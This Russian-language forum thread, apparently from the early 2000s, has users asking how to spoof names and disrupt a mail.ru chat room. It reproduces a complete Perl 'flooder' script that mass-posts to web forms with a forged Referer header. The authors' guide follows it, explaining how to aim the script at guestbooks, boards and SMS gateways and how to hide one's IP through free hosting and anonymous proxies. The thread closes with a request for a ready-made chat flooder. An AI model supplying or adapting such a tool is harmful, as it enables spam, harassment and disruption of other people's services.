Чаты Защищенный ЧАТ

Уважаемые господа,я честно говоря не силет в яве и хтмл и прочее...Но вот в моем любимом чате по адресу chat.mail.ru (тема питер) есть люди ,которые могут писать  сообщения от чужого имени кикать людей с чата и кто-то же иногда кикает весь чат-) Так вот буду признателен если мне поможете разобраться с этим...
ЗЫ-Читал способы взлома на сайте снифферы и нюки но к сожалению это ничего не подходит для данного чата...
С уважение к вашему труду makroz...

 

А можь эту люди мудеры?
Просто, всё, что у меня получалось с этим чатом, это пофлудить... пусть кикают на здоровье!

 

 Тут какой то флудер скачал новый ....опишите-расскажите как он аботает на примере данного чата?!  #!/usr/local/bin/perl
# Flooder, v0.0.0.0.1
# By Uzbeck aka NiFiGaSebe!
############################################################
# Configuration
# Сколько Раз постить сообщение
$flood_no="25"
############################################################
# Не менять
use HTTP::Request::Common;
use LWP::UserAgent;
############################################################
# Выводим верхний хедер в браузер
print <<END;
Content-Type: text/html\n\n

<html>
<head>
 <title>Underground InformatioN Center</title>
 <META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">
</head>
<body>
END
# Конец верхнего хедера
############################################################
# Цикл Флуда
for($i=0;$i<=$flood_no;$i++){

# Создаем новый запрос, менять не надо
$ua = LWP::UserAgent->new();

# Формируем запрос
# Не забываем поставить правильный метод(здесь - ПОСТ) и
# правильный, АБСОЛЮТНЫЙ путь к скрипту
my $req = POST 'http://www.URL.ru/cgi-bin/script.pl',

# Вставляем сюда все найденные INPUT теги,
# порядок не имеет значения.
             [ name => "Вот так",
             email => "[email protected]",
             subject => "Мессага номер:$flood_no",
             body => "Body",
             # Если сервер имеет защиту от ламерства, и не
             # пропускает два сообщения с одинаковыми
             # телами, то сделать так(заменить на ориг
             # если требуется):
             # body => "Body" . $flood_no . "\n",
             # Это сделает каждое сообщение уникальным

             url => $url,
             url_title => $url_title,
             img => $img ]; # Стоит заметить, что после
                            # последнего значения не
                            # стоит запятой как в
                            # предыдущих случаях

# Подмена поля РЕФЕРЕР. ВНИМАНИЕ, любой нормальный скрипт,
# запрос без правильного реферера НЕ пропустит!
$req->referer("http://www.URL.ru/form.html");

# Отсылка запроса
$ua->request($req);

# Пауза, в секундах, очень важно! если посылать без паузы,
# то скрипт не справится с потоком и сможет обработать
# ТОЛЬко некоторые запросы.
sleep(7);

}
# Конец цЫкла флуда
############################################################
# Нижний хедер, который мы показываем после окончания флуда
print <<END;

<center><h1>Wooooofff...FINISHED!</h1></center>

</html></body>

END

1;
а вот описание выложенное авторами

looder, v0.0.0.0.1
===================

Итак, по просьбам телевизоров, представляю вам
простой и ламерский флудер. НЕ злоупотребляйте!

Description:
============
Этот  скрипт  может быть использован для отсылки массовых сообщений скрипту
на  определенный  сервер.  Чаще всего, такое дерьмо используют для бомбежки
неприятельских досок, гостевых книг, мобильных телефонов(через SMS Гейты) и
т.д. Скрипт полностью закомментирован, и сделан в виде "конструктора". Даже
ЛАМЕР сможет сделать из него опасную "Игрушку" за 15 минут(!!&#33. Удачи!

Принцип флудера очень прост: происходит автоматизация заполнения форм.

Information Collection & Configuration:
=======================================
Итак,  для  того,  чтобы настроить скрипт, прежде всего, необходимо собрать
ВСЮ  информацию  о  том,  что  пошлет бравзер когда вы заполните форму. Для
начала зайдите на ту страничку, откуда бы вы смогли послать данные из формы
вручную,  то есть на ту страничку где и есть сама форма. Скопируйте адрес с
этой  странички  и  в  скрипте  введите  его  в поле referer(то есть вместо
http://www.URL.ru/form.html).  Второе,  что необходимо сделать, это открыть
исходник формы в HTML(через View Source). Как только откроете, то исчите ту
часть  кода,  где  есть  тег начинающийся с "<form", все что стоит до этого
тега  стоит выбросить, для удобства. Теперь, в этом самом теге начинающемся
с  "<form"  ищем переменную action - там будет путь(адрес) скрипта. Если он
не  начинается  с  "http://",  то  вам  стоит  скопировать  то  что есть, и
присоединить в начало этого полный путь до скрипта. Найти полный путь можно
посмотрев на тот самый адрес странички исходника с формой. Найденный полный
путь  до  скрипта  мы  вставляем  в  поле  создания запроса, то есть в $req
(ставим  его,  в  нашем случае вместо http://www.URL.ru/cgi-bin/script.pl).
Теперь осталось самое сложное. Создаем доп. текст документ, и туда копируем
все  найденные теги которые начинаются с "<input"(единственный тег, который
нужно  пропустить,  это  тот,  который  имеет  type=reset, про него следует
забыть).  Итак, дальше, все INPUT теги, которые имеют type=hidden, замечаем
их  значения  и  прямо  вставляем  в  запрос  эти  самые значения(name тоже
вставляем).   Приведу  пример:  есть  тег  -  <input  type=hidden  name=wow
value=cool>,  тогда  в скрипт, в само фримирование запроса мы вставим - wow
=>  "cool".  А  вот для всех остальных типов(type) запоминаем только name и
делаем  запись  для  каждого,  значения,  есессно, присваиваем такие, какие
необходимы.  Вот  вроде  и  все. То что было сказано, написано для ламеров,
потому  что  из скрипта и так ясно, что и куда. Ну а если вам непонятно, то
тогда I feel sorry 4 u. :-(((((

Installation:
=============
После подготовки(конфигурации) скрипта, его стоит установить. Можно сделать
это  одним из ДВУХ методов:
1) Если   у   вас   установлен  Перл  интерпретатор  (или  собираетесь  его
установить),  то  все  просто: Запускаете етот скрипт прямо в отладчике или
через командную строку (>perl flood.cgi)

2) Если вы:
+ Не имеете Перл интерпретатор и не желаете его ПОИМЕТЬ
+ Желаете остаться анонимными(не светить свой IP)
+  Затрудняетесь  зайти  в  ДОС  окошко  и ввести вышеуказанное в командную
строку, ТО для вас следующий способ:
Регистрируетесь  на  любом  бесплатном  хостинге,  где  поддерживается  CGI
scripting  in  Perl(например http://www.h1.ru). Входите через FTP на сайт и
кладите скрипт в вашу исполняемую директорию(чаще всего это cgi-bin). После
того  как  скрипт  там, вам необходимо его проЧМОДить. Ставьте ЧМОД 711(для
всех  групп разрешен только запуск). Как ставить ЧМОДы на файлы, я объснять
не  буду,  спросите у Линукса Тровальдса или у Аллы Пугачевой, они помогут.
После  того  как  на  скрипт наложена метка запуска, его, как вы наверное и
догадались,  стоит  просто  запустить(ввести в бравзер путь к скрипту). Для
анонимности   стоит   запустить  скрипт  через  анонимайзер  или  используя
анонимный прокси.

Удачи! ЕЩЕ раз повторяю: не злоупотребляйте!

== by By Uzbeck aka NiFiGaSebe! [mailto: [email protected]] =======
== [c] Underground Information Center [ http://www.uinc.ru ]==============


КТО ЗНАЕТ ВЫЛОЖИТЕ ПОЖАЛУСТА ИЗ ВСЕГО ЕТОГО ГОТОВЫЙ ФЛУД ДЛЯ ЧАТА нА мэйл ру ?!?!!?!?!